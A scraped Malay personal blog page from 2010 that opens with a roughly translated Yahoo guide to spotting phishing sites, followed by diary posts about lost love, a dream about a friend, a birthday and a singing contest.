Jika anda menerima e-mel (atau mesej segera) dari seseorang yang anda tidak tahu mengarahkan anda untuk masuk ke sebuah laman web, hati-hati! Anda mungkin telah menerima email phishing dengan link ke laman web phising. Sebuah laman web phising (kadang-kadang disebut "palsu" halaman) cuba untuk mencuri password akaun anda atau maklumat sulit lain dengan pembodohan anda menjadi percaya anda pada laman web yang sah. Anda bahkan bisa mendarat di halaman phising oleh mistyping URL (alamat web).

Apakah laman web yang sah? Jangan tertipu oleh sebuah laman web yang tampak nyata.Sangat mudah untuk phisher untuk membuat laman web yang kelihatan seperti rencana asal, lengkap dengan logo dan grafik lain dari laman web yang dipercayai.

Penting: Jika anda sama sekali tidak yakin tentang laman web, jangansign in Hal selamat untuk dilakukan adalah menutup dan kemudian buka kembali, pelayar anda, dan kemudian taip URL ke Alamat's Bar, pelayar anda. Menaip URL yang benar adalah cara terbaik untuk memastikan anda tidak diarahkan ke laman web palsu.

Phisher semakin canggih dalam merancang laman web mereka palsu. Tidak ada cara yang pasti untuk mengetahui sama ada anda berada di halaman phising, tapi pada sini adalah beberapa penggunaan yang boleh membantu anda membedakan tapak web yang nyata dari sebuah laman phishing.

Semak alamat web

Hanya kerana alamat tersebut terlihat OK, jangan menganggap anda berada di halaman yang sah. Lihat di bar alamat pelayar anda untuk tanda-tanda bahawa anda mungkin di halaman phising:

• Salah nama syarikat. Sering kali alamat web daripada laman phishing kelihatan benar, tetapi sebenarnya mengandungi kesalahan ejaan yang umum dari nama syarikat atau aksara atau simbol sebelum atau selepas nama syarikat. Carilah helah seperti menukar nombor "1" untuk huruf "l" dalam sebuah alamat web (contohnya, www.paypa1.com bukan www.paypal.com).
• http:// pada awal alamat pada Yahoo! halaman login. Semak alamat laman web untuk segala kandungan Yahoo! halaman login. Sebuah sah Yahoo! Sign-in alamat laman bermula dengan "https ://." Carilah huruf "s" berikut "http."
• Hilang slash halaman. Untuk mengesahkan bahawa anda berada di sah Yahoo!, Pastikan garis miring ("/") dipaparkan selepas "yahoo.com" di bar Alamat - seperti contoh ini:





Sebuah garis miring ("/") selepas "yahoo.com" boleh membantu mengenalpasti Yahoo! Tapak.


Contohnya, "http://www.yahoo.com:login&mode=secure" adalah alamat laman web palsu.

Penting: Sebuah Yahoo sah? Laman login tidak pernah bermula dengan "http://geocities.yahoo.com." Jika anda tanah pada halaman GeoCities dengan Yahoo? sign-in tempat, laporkan sebagai laman web phishing akan.
menjadi pop-up yang mencurigakan.

Berhati-hatilah jika anda menghantar ke laman web yang memaparkan pertama tetingkap pop-up yang meminta anda untuk memasukkan nama pengguna dan password anda.penipuan Phishing mungkin mengarahkan anda ke laman web yang sah, tapi kemudian menggunakan pop-up untuk mendapatkan maklumat akaun anda.

Berikan password palsu
Jika anda tidak pasti jika sebuah halaman adalah otentik, jangan gunakan password yang sebenarnya anda untuk sign in Jika anda memasukkan password palsu dan tampaknya masuk, anda kemungkinan besar di halaman phising. Jangan memasukkan maklumat lebih lanjut; menutup pelayar anda. Ingat, walaupun, bahawa beberapa halaman phising secara automatik memaparkan mesej ralat tanpa password yang anda masukkan. Jadi, hanya kerana palsu kata laluan anda ditolak, jangan menganggap halaman tersebut sah.

Lihat anda sign in seal apabila anda sign in ke Yahoo!
A sign-in seal adalah sebuah mesej rahsia atau gambar yang anda pilih untuk memaparkan dalam Yahoo! Sign-in tempat untuk membantu melindungi akaun anda dari phisher. Karena sign-in seal adalah rahsia antara komputer anda dan Yahoo!, Anda boleh yakin anda pada Yahoo sah setiap halaman dengan menggunakan masa yang komputer sign in ke Yahoo!. Hanya mencari teks atau gambar tersuai anda tetapkan. Jika tidak ada, anda mungkin telah mendarat di halaman phising. Menciptakan sign-in seal pantas dan mudah.

laman web lain, seperti yang anda bank dan institusi kewangan lain, boleh menawarkan ciri-ciri yang sama untuk membantu melindungi anda terhadap penipuan phishing.

Gunakan web browser dengan pengesanan anti-phishing
Baik Internet Explorer dan Mozilla Firefox pelayar Web telah tidak Pengaya (atau "plug-in") yang boleh membantu anda mengesan laman phishing.

Berhati-hatilah dengan kaedah lain untuk mengenalpasti laman web yang sah
Beberapa kaedah yang digunakan untuk menunjukkan sebuah laman web yang dalam tidak selalu boleh dipercayai. Sebuah kunci terputus kecil atau gembok terkunci di bahagian bawah pelayar anda bukan merupakan penunjuk yang handal dari sebuah laman web yang sah. Hanya kerana ada kunci atau kunci dan sijil keselamatan kelihatan otentik, jangan menganggap halaman tersebut sah.

Saturday, June 26, 2010

Award Dari Cha Cha =p

0




yeay..
ni award dr cha.. =P
hehe.. tq yarh..
maksu x smpt nk bwt pape award agy la..
nnt dh ade pc maksu bwt ye yayunk =P

reconnect??????

0

huhu..
bodo..
mmg la im still waiting.
sengal ke ape.. hehe..
lagi mau soh wait.. =.="
mau brapa lama wo..
aiya.. talak apa la..
wa sulah lame menunggu. jadi ape salah jike wa tunggu sikit masa lagi..
x pe la. =)
andai kamu kata kamu x smbung semula krn x nk hurt sy lagi, sebaiknye kamu fkr semula.
krn, hnye dgn kamu saya merasa bahagia.
pintu saye selalu trbuke utk menerima kamu kembali, andai kamu ingin berada didalamnye. tapi, kamu x pnh keluar dr tempat asal kamu. =)
nama y kamu sebut mlm td, tiada sapa melainkan hanya seorg kawan. =)
andai dia penyebab bg kamu pkir 2,3 kali, x perlu lagi kmu pkr ttgnye. krn, cuma kamu. =)

Tuesday, June 22, 2010

melissa

0

sape melissa ni?
one of my fren..
last nite..
mmpi ttg dia.
ak mimpi, jmpe semula dgn dia.
adekah esok ak akn btul2 brtemu ngan dia?
atau adekah dia sedang teringt kn aku?
ak terpanggil utk ke umah dia.
tp perlu ke aku ke sana?
seolah ade sesuatu y dia suruh ak bwt kn.
ak sndiri x tau dia hidup agy x.
tp mimpi mlm td...
x terkata.
orang selalu kate mimpi tu mainan tido, tp mimpi ni spt benar2 tjadi.
bile bgn dr tido asa letih sgt.
cume persoalannye, nape mlm td?
perlu ke aku kesana?
cr jwpn y ak nk selama ni?
bertemu dgn mel mungkin akn mmbawa penemuan ke org y plg jahanam y pnh ak jumpe?
klau betul, dpt ke aku tuntut semula semua hutang lelaki jahanam tu?
tp nape secara tibe2?
bnde ni mengganggu fikiran ak.
menangis dlm tidur.
dan org2 sekeliling dan situasi y seolah aku pernah berada di tempat itu.
aku sndiri x pasti.
aku akn terus memikirkannya selagi ak x dpt jwpn.
x kire ape jd sekalipun, mel tetap kwn ak.
dan ak berhak utk tau ape y dh jadi selama ni.
NUR MELISSA JAPLIS.
andai ade y mengetahuinya, tlg lah

~misteri melisa~

Sunday, June 13, 2010

june 13th =)

0

:happybirthday to u :smile..

!muax semua untuk kamu. :smile
x sangke y kamu terima n pakai that "F" :smile
sy sgt terharu !akhirnye
n thanz for calling last nite :talipon.
saya sgt sgt sgt hrgainye, dan itu tlh mengambalikan senyuman y telah lame x terukir.
saat kamu katakan y kamu hrgainye, itu mmbuat saya trharu :smile
sgt2 trharu. dan apabila kamu katekn y>> im wearing it rite now<<
it makes me cry :smile
dan apabila kamu kate y kamu hrgai semua y sy buat utk kamu, itu semakin mmbuat saye bertambah gmbira dan masih menyayangi kamu :smile
terima kasih tuhan kerna mendengar doa ku :doa

andai ku ucap i miss u, dan kamu ucap i miss u too, itu pun sudah cukup mmbuat tidur ku lena semalaman.

forever with luv...

~nurul~

Monday, June 7, 2010

single pertamaku @ frenzyfm

1

ahaks..


jeng3...

ape nih?

ah-ha.. ni sume utk anda..

  • anda suke melalak?
  • anda suke menyanyi?
  • anda suke muzik?
  • anda suke frenzy?
ini peluang anda.
anda dijemput untuk menyertai segmen SINGLE PERTAMAKU.
caranya? mudah aje..

  • carik minus 1 @ main instrumen sendiri spt guitar, biola, piano, rekorder etc.
  • record kn sore anda.. sora anda ye. jgn ngelat gune sore org len.
  • hantar kan melalui komen di entry ini..
  • penyrtaan x terhad, dimana anda berhak mnghantar seberapa byk pon rakaman anda.
  • pastikan tajuk recording anda mengikut format ini>> single pertamakutajuk laguby
  • cth: single pertamaku farhana by DaKMuO
tq :P

Friday, June 4, 2010

~mencuba menempuh hari keempat tanpa kamu di ingatan~

0

tup2 je dh masuk hari ke-4.

kejap je asanya. !yea

dan hari pon ak mule x merply msg dr hafis.
tp spt biase.. walau off phne sejam, msti ade byk msg n miskol. !akhirnye

tp 1 je ak mnx.
klau betul2 nk kn ak, ak x nk share. tu je syaratnye.
pilih satu. ak atau dia.
tp mungkin bile kau dh ade keputusan, sume dh trlambat. !akhirnye

tp buat seorg lelaki y aku pggl abg, hanya abg tmpt adk tumpang kasih. adk tau, abg marah n larang adik bwt itu ini sbb abg syg adk. n abg lebih tau prangai mereka mcm mn. adk pon syg abg. adk nk abg jadik abg adk smpi adk kawen. smpi adk mati. adk x mo abg len.
adk syg sgt abg. cyg sgt !muax

Wednesday, June 2, 2010

sehari berhenti mengingati kamu

2

hari pertama cuba menjalani titian untuk melupakan kamu.

tiada byk beza.
masih mencuba untuk meneruskan.
doakan aku berjaya melupakan mu, kerana itu mahumu.
tidak pernah ak ketahui mengapa sgt sukar bagiku untuk menjauhkan kamu dr hati dan fikiran ku.
andai ak dpt bertemu jwpn nya.
pasti aku cuba amalkan agar kehendak mu tercapai.

cuba berdoa untuk menempuh hari kedua =)

Monday, May 31, 2010

~suDah Tiba MasAnyA aKu LepaSkaN seMuaNya~

0

:)


mulai saat ini,
aku berjanji kepada diri dan nyawa aku sendiri,
bahawa ak dgn tulus n jujurnya akan melepaskan segalanya.. :)

walau telah begitu lama aku mencintainya. namun kini aku telah berjanji yang tiada lagi kata2 dari ku. tiada lagi sebarang ingatan untukmu.. andai kau farhan yang pernah aku cinta satu saat dahulu, kini aku telah anggap yang dirimu hanya satu episod mimpi indah. :)
terima kasih untuk segalanya. andai pernah aku ke sana, dan mungkin akan bertentang mata, tidak sekali pun aku akan mengenang pandangan mu yang pertama. terima kasih farhan.

dan buat hafis,
dari saat ini juga, aku x akan menemani malam mu lagi.
biarkan aku lepaskan keduanya malam ni juga.
dan ingatlah, aku bukanlah untukmu.
jangan pernah tinggalkan dirinya untuk diriku..
walau aku mmemhon dan meminta hatimu..
andai aku pergi, jgn kau jejak jalan ke rumah ku.
jangan kau sesali kepergianku.
kerana bagiku, ini jalan terbaik yang aku dpt lihat.

kini tiada lagi dirimu dalam lintasan masa hidupku.
akan ku lupakan semuanya.
mungkin bunyinya agak kejam.
tapi kekadang aku harus belajar memntingkan diri sendiri.
biarlah ape pun tuduhan yang kau beri, namun sesungguhnya sejak kita bersama, tidak ada sesiapa yang mnjadi bayang kita. hanya kau dan aku, hanya aku dan kau.
cuma dlm jiwa kau. masih ada dia.
jadi x slh andai keputusan ak untuk melupakan n meninggalkan segalanya dibelakang.
mungkin akn baru terasa ringan beban. biarlah aku cicirkan sedikit kenangan antara kita.
dan terima kasih atas segalanya.
kini, aku cuba untuk menjadikan kau satu babak mimpi indah.

sama seperti farhan dan kenangan nya.
hafis dan farhan kini sama.
hanya kenangan y telah di cicirkan di tgh jln ak menuju ke sana.

walau ape pun y trjadi, kamu dua tetap aku syg hingga kiamat.
=)

with lurve.. :love

Tuesday, May 18, 2010

segmen jom kenal2....

0

y ni pekerjaan sesuai mengikut tarikh lahir





ni plak kenal lebih dalam





ni pon same =)





ni pon gune tarikh lahir juge




same lah ni juge =)




darah saye O+ve =D




namaku indah =)

Monday, May 17, 2010

aku pilih DERITA

1


kaulah bahgia
kaulah derita

syg...
betapa berat beban y aku tanggung selama ini..
ku x anggap ini sebagai ujian..
tp ku anggap sebagai balasan..

Bagaimana ingin aku membencimu
Jikalau setiap hari merindu
Sekiranya derita merinduimu
Itu sebenarnya bahagia
Aku pilih derita

bagaimana harus ku membencimu..
setiap mlm sebelum aku menutup mata akan ku tatap wajahmu..
lena bersama sisa airmata..
mimpikan kenangan bersama..

Kau kata kau cinta
Kau kata kau sayang
Kini entah di mana
Tiada lagi kemesraan

Kau kata setia
Hanya aku saja
Tapi hilang ke mana
Tiada lagi keriangan

Ku tabahkan hati
Ku genggam azimat
Untuk ku balut luka semakin mendalam
Biarku hadapi walaupun tergugat
Akan ku benamkan biar jadi debu

Kini ku mengerti
Istilah sebenar
Di dalam bercinta
Tiada kepastian
Tiada penentuan
Akan kebahagiaan
Semua percintaan
Haruslah berkorban
Tiada batasan

itu yang aku rasakan kini..
kerana hatiku aku x lah seteguh Tugu Negara..
sabar ku x sepanjang Jambatan Pulau Pinang..
cintaku setinggi KLCC..
kasih ku seluas Laut China Selatan..
tidak pernah sedikit pun bergetar seperti gempa bumi di sumatera..
jiwa ku kadang memberontak seperti buaya di melaka..
kadang persis tasik dayang bunting kolam air mataku..
namun walaupun kadang iman ku secondong menara teluk intan,
di sini aku masih menunggu seperti kapal si tanggang yang telah lama mnjadi batu..
tidak pernah habis walau habis 7 keturunan Mahsuri..
dan aku harap kau tak sekejam Raja Singapura yang membuat keputusan mmbunuh Hang Nadim..
kerana aku hanya lah seorang pengemis cinta..

sayang.. comeback to me..
hney x kesa ape y dh jd b4 ni..
and hney btul2 masih menunggu kepulangan syg ke pangkuan honey..

~luv till 2nd life~

Related Posts with Thumbnails